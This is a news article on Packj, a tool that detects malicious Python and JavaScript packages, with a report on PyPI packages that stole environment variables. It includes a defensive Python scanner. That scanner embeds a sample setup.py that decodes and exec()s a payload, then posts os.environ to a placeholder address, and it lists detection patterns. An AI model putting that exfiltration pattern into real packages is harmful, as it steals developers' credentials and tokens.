Packj: a tool for detecting malicious libraries in Python and JavaScript

The developers of the Packj platform, which analyzes the security of libraries, have published an open-source command-line tool that identifies risky patterns in packages: patterns that may indicate malicious activity, or the presence of vulnerabilities that could be exploited to attack the projects that depend on the package in question (supply-chain attacks). Checks are supported for Python and JavaScript packages hosted in the PyPI and NPM repositories (support for Ruby and RubyGems is planned for this month). The tool is written in Python and distributed under the AGPLv3 license.

Running the tool over 330 thousand packages in the PyPI repository revealed 42 malicious packages containing backdoors and 2.4 thousand risky packages. During a check, the code is analyzed statically to determine which APIs it uses, and the package is checked against the OSV database for known vulnerabilities. API analysis relies on the MalOSS package. The package code is also examined for typical patterns commonly found in malware; these patterns were derived from a study of 651 packages with confirmed malicious activity.

The tool also flags attributes and metadata that raise the risk of abuse, such as: executing code blocks via "eval" or "exec"; generating new code at run time; use of code-obfuscation techniques; manipulation of environment variables; access to files unrelated to the package; access to network resources from the installation script (setup.py); typosquatting (names that resemble those of popular libraries); projects that have long been abandoned; nonexistent maintainer email addresses and websites; and the absence of a public repository holding the code.

Separately, other security researchers have identified five malicious packages in the PyPI repository that sent the contents of environment variables to an external server, apparently in order to steal tokens for AWS and continuous-integration systems: loglib-modules (presented as modules for the legitimate loglib library), pyg-modules, pygrata and pygrata-utils (passed off as additions to the legitimate pyg library), and hkg-sol-utils.
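The following is an added illustration of the kind of static heuristics described above (eval/exec, obfuscated payloads, environment-variable reads, network access from setup.py, typosquatted names) and of the environment-exfiltration pattern exhibited by the packages just listed. It is not Packj's own code, nor a reproduction of its rules: the signal names, the module and call lists, the edit-distance typosquat heuristic, the "popular" package list and the sample setup.py are all assumptions made for this example. The sample script is only parsed, never executed.

```python
"""Static risk-signal scanner in the spirit of the heuristics described above.

Added illustration, not Packj's own code. The signal names, the module/call
lists, the typosquat heuristic and the sample setup.py are assumptions made
for this example.
"""
import ast
from typing import Dict, List

CODE_EXEC_CALLS = {"eval", "exec", "compile", "__import__"}          # run or generate code at run time
OBFUSCATION_CALLS = {"base64.b64decode", "codecs.decode",            # decode a hidden payload
                     "zlib.decompress", "marshal.loads"}
ENV_ACCESS = {"os.environ", "os.getenv"}                              # read the process environment
NETWORK_MODULES = {"socket", "urllib", "http", "requests",           # top-level modules whose import
                   "httpx", "ftplib", "smtplib"}                      # implies network access


def _dotted_name(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(source: str, filename: str = "module.py") -> Dict[str, List[int]]:
    """Map each risk signal found in `source` to the line numbers where it occurs."""
    signals: Dict[str, List[int]] = {}

    def hit(signal: str, lineno: int) -> None:
        signals.setdefault(signal, []).append(lineno)

    for node in ast.walk(ast.parse(source, filename)):
        if isinstance(node, ast.Import):
            if any(a.name.split(".")[0] in NETWORK_MODULES for a in node.names):
                hit("network_access", node.lineno)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                hit("network_access", node.lineno)
            if node.module == "os" and any(a.name in ("environ", "getenv") for a in node.names):
                hit("env_access", node.lineno)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in CODE_EXEC_CALLS:
                hit("code_execution", node.lineno)
            elif name in OBFUSCATION_CALLS:
                hit("obfuscation", node.lineno)
        elif isinstance(node, ast.Attribute) and _dotted_name(node) in ENV_ACCESS:
            hit("env_access", node.lineno)

    # Derived signals: network use inside the install script runs on `pip install`,
    # and environment reads combined with network use match the exfiltration
    # pattern of the PyPI packages discussed above.
    if filename.endswith("setup.py") and "network_access" in signals:
        signals["install_time_network"] = list(signals["network_access"])
    if "env_access" in signals and "network_access" in signals:
        signals["env_exfiltration_pattern"] = list(signals["env_access"])
    return signals


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance using the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, popular: List[str]) -> List[str]:
    """Popular names that `name` may be impersonating. Assumed heuristic:
    within two edits of a popular name, or that name plus a hyphenated suffix."""
    return [p for p in popular
            if p != name and (_edit_distance(name, p) <= 2 or name.startswith(p + "-"))]


# Constructed sample install script: decodes a payload, exec()s it, collects the
# environment and posts it to a TEST-NET address. Only parsed here, never run.
MALICIOUS_SETUP_PY = """\
import os, base64, urllib.request
from setuptools import setup

payload = base64.b64decode("cHJpbnQoJ2hpJyk=")
exec(payload)
leaked = dict(os.environ)
urllib.request.urlopen("http://203.0.113.10/collect", data=repr(leaked).encode())
setup(name="loglib-modules", version="0.1")
"""

if __name__ == "__main__":
    for signal, lines in sorted(scan_source(MALICIOUS_SETUP_PY, "setup.py").items()):
        print(f"{signal:26} lines {lines}")
    print("possible typosquat of:", typosquat_candidates("loglib-modules", ["loglib", "requests"]))
```

The scanner is deliberately signal-based rather than verdict-based: `install_time_network` and `env_exfiltration_pattern` are the combinations a reviewer would want surfaced first, while a bare `obfuscation` or `code_execution` hit in a large project is often benign and needs a human look. The typosquat check is equally coarse (it will pair "numpy" with "sympy", for instance), so treat its output as a prompt for review, not as proof of impersonation.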

source: budenet.ru